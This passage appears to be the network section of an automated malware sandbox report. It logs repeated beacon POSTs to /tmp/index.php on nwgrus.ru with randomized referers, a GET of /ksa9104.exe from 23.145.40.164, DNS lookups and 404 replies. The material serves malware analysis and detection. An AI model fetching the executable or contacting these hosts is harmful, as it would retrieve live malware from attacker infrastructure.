                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sahyhdmmcvpatde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqjnmccnpjtfli.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkxskklaphmdca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmrribpoppj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fvhbfgwwnuywwuoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcoutespihad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmsjsfqrqyrxj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etwlmvbptmw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hytemqketckrb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgmthbbcemjcwdac.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mclmeggoidfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywnrujdiubrl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llaskwsfjjpffj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrxoolvtsikko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjiiqjlirvpxdxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhprqvsefqk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtfvgsblgpnxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxyakrfxevg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tltlkajmdifu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsllnqutblayn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qqewfcdsrwqbg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdbldukfsrlj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgaydglbcbbvar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ticrvurjrjsf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drnoexjyrauki.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbbiwyhshhf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvjpwlsevsc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vssaauwgvmedfq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pubortabbcvvvfcg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfyrxdwalbtb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyhrbrqisswma.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtigasxvtneuwtdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frgbxqyrenbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahaddcjrcpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqyabdaoinn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                  Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                  Source: global trafficDNS traffic detected: DNS query: globalviewsnature.com
                  Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://chraqvgclyunxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:30 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:31 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:38 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:54:53 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:09 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:56:00 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
